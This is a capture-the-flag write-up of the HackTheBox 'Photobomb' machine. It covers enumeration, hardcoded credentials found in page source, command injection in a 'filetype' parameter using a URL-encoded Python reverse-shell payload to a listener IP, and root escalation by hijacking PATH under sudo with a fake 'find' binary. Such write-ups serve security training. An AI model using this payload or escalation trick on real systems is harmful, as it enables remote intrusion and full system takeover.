Photobomb — HackTheBox Machine Simple Writeup | 2023
HackTheBox’s Photobomb Machine — Simple writeup | Karthikeyan Nagaraj
Machine Link — Access the Machine Here
Make sure to Connect with the HackTheBox’s VPN before start
Analysis:
- Let’s Perform a
nmapscan,directoryand Subdomain Enumeration First
Open ports
22 - ssh
80 - http2. Let’s Enumerate the HTTP
Make sure to addphotobomb.htb to your hosts using the Below command
3. On Inspecting the Source code we got something Interesting
http://pH0t0:b0Mb!@photobomb.htb/printerSeems Like a Username and PasswordpH0t0:b0Mb!
4. Let’s try to log in with the Creds
We are Logged in : )
But It seems Nothing to be Interesting
5. Let’s Intercept the Request through burp
If you test each Parameter with code Execution commands, you’ll get to know that, we can inject commands onfiletype which can be used to get Reverse shell
6. Let’s Start the Netcat server and use the payload
The payload to be Injected on thefiletype parameter is mentioned below
Make sure to add your
IP addressand theportused in netcat
%3bexport+RHOST%3d"10.10.14.35"%3bexport+RPORT%3d2929%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'7. Send the request with the payload infiletype parameter
8. We got the reverse Connection. Before we start, let’s make Interactive shell using the below command
python3 -c "import pty;pty.spawn('/bin/bash')" 
9. Now Let’s try to exploit the session to escalate root privilege
We can use linpeas to find a way to In
Linpeas is a popular tool used to search for possible paths to escalate privileges on Linux, Unix, and MacOS hosts.
Seems like we can runcleanup.sh with root permission. So let’s try to view the contents ofcleanup.sh for any possibilities to gain root privilege
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;10. Let’s addbash in a file and let’s execute it with root permission
wizard@photobomb:~/photobomb$ echo bash > find
echo bash > find
wizard@photobomb:~/photobomb$ chmod +x find
chmod +x find
wizard@photobomb:~/photobomb$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
17efb291c8f2de7f3feae82386cb07c4Flag: 17efb291c8f2de7f3feae82386cb07c4Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )
Thank you for Reading!!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
